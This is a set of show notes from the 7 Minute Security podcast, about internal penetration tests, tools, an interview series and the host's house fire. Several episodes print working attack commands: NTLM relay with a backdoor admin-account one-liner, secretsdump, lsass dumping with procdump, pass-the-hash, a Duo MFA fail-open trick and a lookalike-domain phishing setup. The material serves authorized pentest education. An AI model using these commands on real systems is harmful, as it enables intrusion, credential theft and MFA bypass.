It’s episode 401 and we’re having fun, right? Some things we cover today: The Webinar version of the DIY Pwnagotchi evening will be offered in Webinar format on Tuesday, March 10 at 10 a.m. A quick house fire update - we’re closer to demolition now! I finally got a new guitar! Besides that, I’ve got a wonderful tale of pentest pwnage for you. Warning: this is a TBC (to be continued) episode in that I don’t even know how it will shake out. I’m honestly not sure if we’ll get DA! Here are the highlights: I think in the past I might've said unauthenticated Nessus scans weren't worth much, but this test changed my mind. If you can't dump local hashes with CrackMapExec, try SecretsDump! ./secretsdump.py -target-ip {IP of target machine} localhost/{username}@{target IP} If you're relaying net user commands (or just typing them from a relayed shell), this one-liner is a good way to quickly add your user to local admins and the Remote Desktop Users group: net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add Trying to RDP into a box protected with Duo MFA? If you can edit the c:\windows\system32\drivers\etc\hosts file, you might be able change the Duo authentication server from api-xxxxxxx.duosecurity.com to 127.0.0.1 and force authenetication to fail open! Source: Pentest Partners In general, keep an eye on CrackMapExec's output whenever you use the '-x' flag to run commands. If the system is "hanging" on a command for a while and then gives you NO output and just drops you back at your Kali prompt, the command might not be running at all due to something else on the system blocking your efforts. More on today's show notes at 7ms.us!

Wow, happy 400th episode everybody! Also, happy SIXTH birthday to the 7MS podcast! Today I've got a really fun tale of internal network pentest pwnage to share with you, as well as a story about a "poop-petrator." Key moments and takeaways include: Your target network might have heavy egress filtering in place. I recommend doing full apt-get update and apt-get upgrade and grabbing all the tools you need (may I suggest my script for this?). If the CrackMapExec --sam flag doesn't work for you, give secretsdump a try, as I ran it on an individual Win workstation and it worked like a champ! If the latest mimikatz release doesn't rip out passwords for you, try the release from last August. For whatever reason (thanks 0xdf) for the tip! If your procdumps of lsass appear to be small, endpoint protection might be getting in the way! You might be able to figure out what's running - and stop the service(s) - with CrackMapExec and the -x 'tasklist /v' flag. If you need to bypass endpoint protection, don't be afraid to go deep into the Google search results. Unfortunately, I think that's all I can say about that, as vendors seem to get snippy about talking about bypasses publicly. Has 7MS helped you in your IT and security career? Please consider buying me a coffee!

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Believe it or not I'm pentesting your stuff I never thought I could feel so free-hee-hee I compromised one of your Domain Admins Who it could be? The guy with "Password123" In today's episode we're talking all about building your own password-cracking rig! "Wait a minute!" you say. "Are you abandoning the Paperspace password cracking in the cloud thing?" Nope! I'm just bringing that methodology "in house" for a little better opsec and also because last year on Paperspace I spent thousands of dollars. First things first - here's the hardware I ended up with: Inland Premium 512GB SSD 3D NAND M.2 2280 PCIe NVMe 3.0 x4 Internal Solid State Drive [Intel Core i5-9400F Desktop Processor 6 Core up to 4.1GHz Without Processor Graphics LGA1151 (Intel 300 Series chipset)](https://www.microcenter.com/product/602028/intel-core-i5-9400f-desktop-processor-6-core-up-to-41ghz-without-processor-graphics-lga1151-(intel-300-series-chipset) ASUS ROG Strix Z390-H Gaming LGA 1151 ATX Intel Motherboard EVGA SuperNOVA 1200P2 1200 Watt 80 Plus Platinum Modular Power Supply For a full shopping list and more notes, head to 7ms.us!

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. I'll be your Raspberry Pi zero baby I don't know what else to say I'll keep bad stuff off of your network I will do it both night and day Today I talk about four cool Raspberry Pi projects that will help you better secure your network. First off though, I give a shout out to my son Atticus who I want to be more like because he doesn't give a rat's behind what other people think of him! The cool Pi-based projects I love are: Pi-Hole is a black hole for Internet advertisements and it literally installs with just a few commands: git clone --depth 1 https://github.com/pi-hole/pi-hole.git Pi-hole cd "Pi-hole/automated install/" sudo bash basic-install.sh Pwnagotchi is a cute little devil who exists only to capture WPA handshakes! I did a whole episode on it, and invite you to build a DYI Pwnagotchi with me live on Feb 10. How to use a Raspberry Pi as a Network Sensor is a really cool Webinar I watched (brought to us by our pals at BHIS and ActiveCountermeasures) that shows you how to use a Pi with an external drive to install Bro and other tools to help you find bad stuff on your network. CanaryPi is freaking sweet and can detect NBNS/LLMNR/mDNS spoofing as well as port-scanning, yeah baby! And coming soon (hopefully): mitm6 detection! Has 7MS helped you in your IT and security career? Please consider buying me a coffee!

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. I'm working on a new security song called Don't Let the Internet Get You Down, and the chorus will go something like this: Don't let the Internet get you down It's full of trolls and 10 year olds and adolescent clowns So let their words roll off of you, like water off a duck To prove to them that you don't give a darn On a more serious note, here are some opsec tips that hopefully will help you as a security consultant: Good contracts - make sure your SOWs have lots of CYA verbiage to protect you in case something breaks, your assessment schedule needs to be adjusted, etc. Also, consider verbiage that says you'll only retain client testing artifacts (hashes, vuln scans, etc.) for a finite amount of time. Scope - make sure you talk about scope, both in written and verbal form, often! Also, a Nessus scanning tip: use the nessusd.rules file to not scan any IPs the client doesn't want touched. That way Nessus won't scan those IPs even if you try to force it to! Send information to/from clients safely - consider forcing MFA on your file-sharing portals, as well as a retention policy so that files "self destruct" after X days. ....and more on today's episode (see 7ms.us for more show notes)! Has 7MS helped you in your IT and security career? Please consider buying me a coffee!

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. In last week's episode I was very close to potentially synching up some very sensitive data with my super secret back door account. In this episode, we resolve the cliffhanger and talk about: How I don't remember lyrics or titles to songs - even the ones I love - such as My Prerogative. That's why Jack Black is my spirit animal, and he's awesome for singing Elton John songs right to Elton John If you get DA (relatively) quickly, consider pivoting to a network assessment and crack hashes with secretsdump, test egress filtering, run Network Detective and more Once you've cracked all the hashes you can, run it through hashcombiner and Pipal like this: python /opt/hashcombiner/hash_combiner.py user_hash hash_password | sort > combined.txt cut -d ':' -f 2 combined.txt > passwords.txt ruby /opt/pipal/pipal.rb passwords.txt > pip.txt The procdump + lsass trick is still really effective (though sometimes AV gobbles it) (See full show notes at 7ms.us!)

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. In today's tale of pentest pwnage I got to try some tools and tricks for the first time! Here are the key points/takeaways from this test: It's great to have additional goals to achieve in a network pentest outside of just "get DA" PayloadsAllTheThings has a great section on Active Directory attacks Using mitm6 and ntlmrelayx is now my new favorite thing thanks to The Cyber Mentor's fantastic video showing us exactly how to launch this attack! If you're scared of running mitm6 and accidentally knocking folks off your network, setup your Kali box to reboot in a few minutes just to be safe. Do something like: shutdown -r +15 "Rebooting in 15 minutes just in case I mitm6 myself right off this box!" When mitm6+ntlmrelay dumps out a series of html/json files with lists of users, groups, etc., read through them! Sometimes they can include treats...like user passwords in the comment fields! Use crackmapexec smb IP.OF.DOMAIN.CONTROLLER -u username -p password to verify if your domain creds are good! There are a bunch of people I need to thank because their tools/encouragement/advice played a part in making the test successful. See today's show notes on 7ms.us for more info!

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Sung to the tune of "Do You Wanna Build a Snowman" Do you wanna build a Pwnagotchi? Even though you thought you never would? I really hope mine doesn't ever break It grabs wifi handshakes It does it really good! Today's episode is all about Pwnagotchi, a cute little device whose sole purpose in life is to gobble WPA handshakes! Check out today's episode to learn more about the device (as well as some pwn-a-gotchas that you should be aware of), and then come to the next 7MS user group meeting to build your own! If you can't make this meeting I'll also do a Webinar version of the presentation - likely in February or March, so stay tuned to our Webinars page. At the end of today's episode I talk about my troll foot. I fractured my ankle on Christmas Eve and was basically this lady. At the end of the day I received an avulsion fracture and it kinda made my Christmas stink. But 2020 is gonna absolutely rip, friends!

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Peter Kim of The Hacker Playbook series joins me today to talk about all things hacking! Peter runs a popular west coast hacker meetup, and I was fortunate enough to attend his Real World Red Team training, which I wrote a review about here. Peter sat down with me over Skype to talk about: The origin story of The Hacker Playbook series (btw please buy it, don't steal it! :-) How do you balance work and family life when trying to pwn all the things and have a personal life and significant other? How do you break into security when your background is in something totally different, like a mechanic, artist or musician? What are some good strategies when approaching a red team engagement - do you always start "fresh" from the perimeter? Do you assume compromise and throw a dropbox on the network? Some combination of both? What are some other low-hanging fruit organizations can use to better defend their networks? Do you run across some of these good defenses - like honeypots - in your engagements? If you could put on a wizard hat and solve one security problem (be it technical, personnel or something else) what would it be? ...and more!

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. Today's episode is all about LAPS - Microsoft's Local Administrator Password solution. In a nutshell, LAPS strengthens and randomizes the local administrator password on the systems across your enterprise. We talked about it way back in episode 252 but figured it was worth a revisit because: It's awesome It's free People still haven't heard of it when I share info about it during conference talks! I've got a full write-up of how to install LAPS here At a recent conference people asked me two awesome edge case questions: What if I aggressively delete inactive machines from my AD - does the LAPS attribute go with it? What do I do if I use Deep Freeze and the LAPS password attribute in AD keeps getting out of sync with the actual password on systems because of Deep Freeze's freeze/thaw times?

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. This is part three of this series - part 1 talked about a fire that destroyed my family's home and vehicles, and part 2 was about how to get "back on the grid" and start working with the insurance machine to find a new "normal." Today, I want to answer some burning questions many of you have been asking: Have you hit rock bottom yet? (Spolier alert: no, but I tell you about a moment I almost lost my mind after dropping a shoe in a storm drain) How long to you get to keep rental cars before you have to replace your permanent vehicles? Do you have to stay in a hotel the whole time your house is rebuilt? What about if you get placed in temporary housing - do you have to rebuy your beds/furniture/clothes/etc. and keep them at your temp place, then move them again once your house is rebuilt? What adjustments might you want to make to your insurance policies to make sure you have the right amount of coverage in case of emergency?

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. Today's episode is a twofer. That's right, two tales of internal network pentest pwnage. Whoop whoop! We cover: What the SDAD (Single Domain Admin Dance) and DDAD (Double Domain Admin Dance) are (spoiler: imagine your dad trying to dance cool...it's like that, but more awkward) A good way to quickly find domain controllers in your environment: nslookup -type=SRV _ldap._tcp.dc._msdcs.YOURDOMAIN.SUFFIX This handy script runs nmap against subnets, then Eyewitness, then emails the results to you Early in the engagement I'd highly recommend checking for Kerberoastable accounts I really like Multirelay to help me pass hashes, like: MultiRelay.py -t 1.2.3.4 -u bob.admin Administrator yourmoms.admin Once you get a shell, run dump to dump hashes! Then, use CME to pass that hash around the network! crackmapexec smb 192.168.0.0/24 -u Administrator -H YOUR-HASH-GOES-HERE --local auth Then, check out this article to use NPS and get a full-featured shell on your targets

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! In part 1 of this series we talked about a tragic event my family experienced a few weeks ago: we lost our house and vehicles in a fire. Today I'll talk about: How to get "back on the grid" when starting with nothing but the clothes on your back. Checklist includes: New licenses New ATM/credit cards Rental vehicles Temporary housing How the most wonderful people in the world come out of your past to lift you up and help you out - and how it may not the people you expect What's it like working with the insurance machine? What do they help with and not help with? How much does it suck to lose all your stuff? (Spoiler alert: a lot) The relief (as weird as that sounds) that comes with losing all your material things Thanks again for your support via GoFundMe

In today's episode I talk about how my family's house and two vehicles were recently destroyed in a fire. The Johnson family is all ok - no injuries, thank God. However, this has turned our world upside down, and over the past week of sleepless nights I've thought a lot about how this tragedy could help others ensure their families are safe and secure both during and after a disaster. I imagine this series will go something like this: Today: Talk about "day zero" - everything that happened on the day of the fire Part 2: Talk about what it's like working with insurance, 3rd party vendors, getting rental cars, finding temporary housing, and basically getting "back on the grid" starting with NO identification or credit cards Part 3: Talk about the people part of all this. What are the effects on the family? On the community? On our health? On our faith? Some folks in the security community were kind enough to setup a GoFundMe if you'd like to support my family during this time.

Today's episode features a few important changes to the tools and services I use to run 7MS: Docusign is out and (sort of) replaced with Proposify Voltage SecureMail is out and replaced by ShareFile Ninite is rad for keeping mobile pentest dropboxes automatically updated! Nessys_SortyMcSortleton has been updated to...you know...work Additionally, we talk about a few biz-specific challenges: How do you (comfortably) talk about money with a client before the SOW hits their inbox? If you're a small security consultancy of 2-5 people, do you lie about your company size to impress the big client, or tell the truth and brag about the advantages a nimble team can bring?

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! I'm sorry it took me forever and a day to get this episode up, but I'm thrilled to share part 4 (the final chapter - for now anyways) of my interview with the red team guys, Ryan and Dave! In today's episode we talk about: Running into angry system admins (that are either too fired up or not fired up enough) Being wrong without being ashamed When is it necessary to make too much noice to get caught during an engagement? What are the top 5 tools you run on every engagement? How do you deal with monthly test reports indefinitely being a copy/paste of the previous month's report? How do you deal with clients who scope things in such as way that the test is almost impossible to conduct? How do you deal with colleagues who take findings as their own when they talk with management? How do you work with clients who don't know why they want a test - except to check some sort of compliance checkmark? What is a typical average time to complete a pentest on a vendor (as part of a third-party vendor assessment)? How could a fresh grad get into a red team job? What do recruiters look for candidates seeking red team positions? If a red team is able to dump a whole database of hashes or bundle of local machine hashes, should they crack them? What do you do when you're contracted for a pentest, but on day one your realize the org is not at all ready for one? What's your favorite red team horror story?

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. Today I'm joined by a very special guest: Mrs. 7MS! She joins me on a road trip to northern MN, reads me some questions from the 7MS mail bag, and we tackle them together (with a side order of commentary on weddings, overheating iPads, cheap hotels and the realization that this is likely the first - and only episode that Mrs. 7MS has ever listened to). Links to things discussed this episode: Wireless pentest certs: SEC617 - SANS course that covers wifi pentesting (with WPA enterprise attacks) Offensive Security Wireless Professional Good/free pentest training options: Pentester Academy VulnHub Rastalabs The Cyber Mentor Free logging/alerting solutions for SMBs: WEFFLES Logging Made Easy HELK Wazuh

In this episode I talk about some things I learned about making your own kick-butt cred-capturing phishing campaign and how to do so on the (relatively) quick and (relatively) cheap! These tips include: Consider this list of top 9 phishing simulators. Check out GoPhish! Then spin up a free tier Kali AWS box Follow the instructions to install GoPhish and get it running on your AWS box Use the Expired Domains site to buy up a domain that is similar to your victim - maybe just one character off - but has been around a while and has a good reputation Add a G Suite or O365 email account (or whatever email service you prefer) to the new domain Create a convincing cred-capturing portal on GoPhish - I used some absolutely disguisting and embarassing HTML like this (see show notes on 7ms.us): Use this awesome article to secure your fancy landing page with a LetsEncrypt cert! Have fun!!!

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! This episode is a "sequel" of sorts to part 9 where I was helping another company tag-team an internal network pentest. (In announcer voice) "When we last left our heroes we had..." Relayed one high-priv cred from one box to another Dumped and cracked a local machine's hash Passed that hash around the network Found (via Bloodhound) some high value targets we wanted to grab domain admin creds from Set the wdigest flag via CrackMapExec Today, we talk about how we came back to the pentest a few days later and scripted the procdump/lsass operation to (hopefully) grab cleartext credentials from these high value targets. Here's how we did it: mkdir /share wget https://live.sysinternals.com/procdump64.exe screen -R smb /opt/impacket/examples/smbserver.py -smb2support share /share Then, we ran the following CME commands to copy procdump over to the victim machine, create the dump, take the dump, then delete procdump.exe: crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'copy "\\192.168.55.60\share\procdump64.exe" "c:\users\public\procdump64.exe"' (more on today's episode show notes)

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. Today's episode is about a pentest that was pretty unique for me. I got to ride shotgun and kind of be in the shadows while helping another team pwn a network. This was an especially interesting one because the client had a lot of great security defenses in place, including: Strong user passwords A SIEM solution that appeared to be doing a great job We did some looking for pwnage opportunities such as: Systems missing EternalBlue patch Systems missing BlueKeep patch What got us a foot in the door was the lack of SMB signing. Check this gist to see how you can use RunFinger.py to find hosts without SMB signing, then use Impacket and Responder to listen for - and pass - high-priv hashes. Side note: I'm working on getting a practical pentesting gist together in the vein of Penetration Testing: A Hands-On Introduction to Hacking and Hacker Playbook.

For Windows VMs Take a snapshot right after the OS is installed, as (I believe) the countdown timer for Windows evaluation mode starts upon first "real" boot. Want to quickly run Windows updates on a fresh Win VM? Try this (here's the source): powershell Install-PackageProvider -Name NuGet -Force powershell Install-Module PSWindowsUpdate -force powershell Set-ExecutionPolicy bypass powershell Import-Module PSWindowsUpdate powershell Get-WindowsUpdate powershell Install-WindowsUpdates -AcceptAll -AutoReboot To turn on remote desktop: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0 To set the firewall to allow RDP: Enable-NetFirewallRule -DisplayGroup "Remote Desktop" To stop the freakin' Windows hosts from going to sleep: powercfg.exe -change -standby-timeout-ac 0 To automate the install of VMWare tools, grab the package from VMWare's site, decompress it, then: setup64.exe /s /v "/qn reboot=r" To set the time zone via command line, run tzutil /l and then you can set your desired zone with something like tzutil /s "Central Standard Time" For Linux VMs Get SSH keys regenerated and install/run openssh server: apt install openssh-server -y mkdir /etc/ssh/default_keys mv /etc/ssh/ssh_host_* /etc/ssh/default_keys/ dpkg-reconfigure openssh-server systemctl enable ssh.service systemctl start ssh.service Then grab some essential pentesting tools using Kali essentials, and keep 'em updated git update Next user group meeting September 30!

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. Today's episode is a continuation of episode #379, where we: Conducted general nmap scans (and additional scans specifically looking for Eternal Blue) Sucked our nmap scans into Eyewitness Captured and cracked some creds with Paperspace Scraped the company's marketing Web site with brutescrape and popped a domain admin account (or so I thought!) Today, the adventure continues with: Checking the environment for CVE-2019-1040 Picking apart the privileges on my "pseudo domain admin" account Making a startling discovery about how almost all corp passwords were stored Enjoy!

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! This episode, besides talking about a man who screamed at me for not being on my cell phone, covers another tale of internal network pentest pwnage! Topics/tactics covered include: Review of setting up your DIY pentest dropbox Choosing the right hardware (I'm partial to this NUC) Running Responder to catch creds Using Eyewitness to snag screenshots of stuff discovered with nmap scanning Nmap for Eternal Blue with nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24 Running Sharphound to get a map of the AD environment Cracking creds with Paperspace When cracking, make sure to scrape the customer's public Web sites for more wordlist ideas!

In today's episode, I sit down with Zane West of Proficio. Zane has been in information security for more than 20 years - starting out in the "early days" as a sysadmin and then moved up into global infrastructure architect function in the banking world. Today Zane manages Proficio's solution and product development. I sat down with Zane over Skype to talk about how companies can better analyze and defend their networks against attacks. Specifically, we talk about: How important is it to have an IT background before you jump into security? How can newb(ish) security analysts and pentesters better understand the political/financial struggles a business has, rather than charge in and scream "PWN ALL THE THINGS!" Is there a "right way" to step into an organization, get a lay of the land and discover/prioritize their security risks? Why in the world does it take twenty seven people to run a SOC?! When should an organization consider engaging an MSSP to help them with their security needs? What if your MSP also provides MSSP services? Is that a good or bad thing? What are some tips for successfully deploying a SIEM? What is the cyber kill chain about, and is it only something for the Fortune X companies, or can smaller orgs tip their toe in it as well? (Here's a nice graph to help you understand it)

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. In today's episode I cover some of the nasty "gotchas" I've run into when sending my pentest dropboxes around the country. Curious on how to setup your own portable pentest dropboxes (and/or pentest lab environments)? Check out part 1 and part 2 of the DIY Pentest Lab video series. Here are some of the pain points I cover today: Turn the firewall off Set Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Domain Profile > Windows Firewall: Protect all network connections to Disabled. Do the same for the Standard Profile by changing Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Standard Profile > Windows Firewall: Protect all network connections to Disabled. Disable Windows Defender Navigate to Computer Configuration > Administrative Templates > Windows Components > Windows Defender and choose Turn Off Windows Defender. Disable power sleep settings To stop computers from snoozing on the job, head to Computer Configuration > Policies > Administrative Templates > System > Power Management > Sleep Settings and set Allow standby states (S1-S3) when sleeping (plugged in) to Disabled Create a second disk on the Windows management VM and install BitLocker to Go Check out today's show notes at 7ms.us for more info!

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. We cover a lot of ground today on a variety of topics: I have an Oculus Quest now and I love it. My handle is turdsquirt if you ever wanna shoot some zombies together. I share a story that yes, does involve poop - but only the mention of it. It's nothing like the epic tale (tail?) of my parents' dog pooping in my son's dresser drawers. I had a really fun pentest recently where I found some good old school SQL injection. I took to Slack to share and since then, several of you have reached out to ask how I found the vulnerability. Here are some steps/tips I talk about on today's episode that will help: Watch Sunny's Burp courses on Pluralsight to enhance your Burp abilities Install CO2 from the BApp store When doing a Web app pentest, feed various fields SQL injection payloads, such as the ones in PayloadsAlltheThings Grab a copy of sqlmap Use sites like this one to help tune your sqlmap commands to find vulnerabilities. In the end, my command I used to dump contents of important tables was this: (See today's show notes on the 7MS Web site for more information!)

I swear this program isn't turning into the Dr. Phil show, but I have to say that sharing tales of fail is extremely therapeutic for me, and based on your comments, it sounds like many of you feel the same way too. Today's takeaways include: Doing a 8-10 hour internal pentest is probably overly ambitious. Seriously, it's really NOT a lot of time. If a client uses a logging/alerting system, vulnerability scanning is very loud to their digital ears Checking for DNS zone transfers is a good idea!

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Ok, I lied a few episodes ago, and I'm sorry! I was on an epic road trip this week and suddenly remembered the pentest that really had the shortest TTDA (time to domain admin) ever. Enjoy that tale on today's podcast! Oh, and I also reference this gist which might help you test your SIEM bells and whistles. Psssst - I'm sorry (but not sorry) but this episode begins with a long story about a dog pooping inside a dresser drawer. If you'd rather skip that, the actual episode begins at about 29:00)

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Today's episode is a two-tale story of me failing fantastically at vulnerability scanning early in my security career. Enjoy. Because I didn't at the time. :-)

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode: Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this: opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt Source: Pwning internal networks automagically Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget: net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add So the full command would be: ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add' Check today's show notes at https://7ms.us for more information!

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute Happy belated 4th of July! Today I've got another fun tale of internal pentest pwnage that comes out of a few recent assessments I did. These tests were really fun because the clients had good defensive measures in place, such as: Having separate accounts for day-to-day operations and administrative/privileged tasks Local Administrator account largely disabled across the enterprise Lean membership in privileged groups (Domain Admins, Enterprise Admins, Schema Admins, etc.) Hard-to-crack passwords! Will I succeed in getting a solid foothold on this network and (hopefully) escalate to Domain Admin? Check out today's episode to find out!

Hey folks, happy secure 4th o' July! In today's seven minute episode (Wha? Gasp! Yep...it's seven minutes!) I kick back a bit, give you some updates and tease/prepare you for some cool full episodes to come in the near future. Topics covered include: NPK, which I talked about last week is super awesome but I'm having issues getting my jobs to run clean. Will keep you posted on progress! Tales of internal pentest pwnage - wow, folks have been sending me feedback that they really like this series. I've got a good episode coming up for you on that front, just can't share right now as the project is just wrapping up. Songwriting - I enjoy writing songs about people to the tune of the old Spiderman theme song. If they ever do a show like The Voice but they're looking for people to write songs about other people based on the Spiderman theme song, I think I've got a shot.

Today's episode is brought to you by my friends at safepass.me. Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Today I'm having a blast with cracking hashes quickly and cost-effectively using NPK. For 1+ years I've loved my Paperspace config, but lately I've had some reservations about it: People are telling me they're having problems installing the drivers My methodology for building wordlists with HateCrack doesn't seem to work anymore I often pay a lot of $ for idle time since you pay ~$5/month just for the VM itself, and then a buck and change per hour the box is running - even when it's not cracking anything. This week on a pentest I wasn't capturing many hashes, and when I finally did it was a really valuable one. So I wanted to throw more "oomph" at the hash but don't have a ton of days to spare. Enter NPK which lets you submit a hash, decide how much horsepower to throw at it, and even set a max amount of $ to spend on the effort. Super cool! I'm loving it so far! Note: I did have a heck of a time with the install (I'm sure it was a me thing) so I wrote up this gist to help others who might hit the same issue: Happy crackin'!

This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8. In today's episode, I toss myself under the proverbial security bus and share a tale of pentest fail. Looking back, I think the most important lessons learned were: Scope projects well - I've been part of many over- and under-scoped projects due to PMs and/or sales folks doing an oversimplified calculations, like "URLs times X amount of dollars equals the SOW price." I recommend sending clients a more in-depth questionnaire and even jump on a Web meeting to get a nickel tour of their apps before sending a quote. Train your juniors - IMHO, they should shoulder-surf with more senior engineers a few times and not do much hands-to-keyboard work at first (except maybe helping write the report) until they demonstrate proficiency. Use automated pentest tools with caution - they need proper tuning/care/feeding or they can bring down Web sites and "over test" parameters.

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free! Hey! I'm on the road again - this time with a tale encompassing: How to conduct a mini risk assessment in just two hours. Some ways to consider adding value : A discussion of administrative and physical controls Create a network inventory using nmap and Eyewitness Conduct an external vulnerability scan with Nessus or OpenVAS How a guy with a gun turned a four-hour road trip into an epic eight hour adventure. Enjoy :-)

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free! Today's episode was recorded on the way to a new assessment, and since I had nothing but miles and time in front of me, I covered two major stories (probably not in order of importance): Why I had two get two haircuts in under and hour (spoiler: it's so I didn't look like an idiot for my client)! An internal pentesting pwnage story - including network and physical security this time around! Enjoy!

This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8. First, a bit of miscellany: If you replace "red rain" with "red team" in this song, we might just have a red team anthem on our hands! If you're in the Twin Cities area and looking for an infosec analyst job, check out this posting with UBB. If interested, I can help make an electronic introduction - and/or let 'em know 7 Minute Security sent ya! Ok, in today's program we're talking about red teaming again with our third awesome installment with Ryan and Dave who are professional red teamers! Today we cover: Recon - it's super important! It's like putting together puzzle pieces...and the more of that puzzle you can figure out, less likely you'll be surprised and the more likely you'll succeed at your objective! Reporting - how do you deliver reports in a way that blue team doesn't feel picked on, management understands the risk, and ultimately everybody leaves feeling charged to secure all the things? I also asked the questions folks submitted to me via LinkedIn/Slack: Any tips for the most dreaded part of an assessment (reports)? How do you get around PowerShell v5 with restrict language mode without having the ability to downgrade to v2? What's an alternative to PowerShell tooling for internal pentesting? (hint: C# is the hotness) What certs/skills should I pursue to get better at red teaming (outside of "Hey, go build a lab!"). Are customers happy to get assessed by a red team exercise, or do they do it 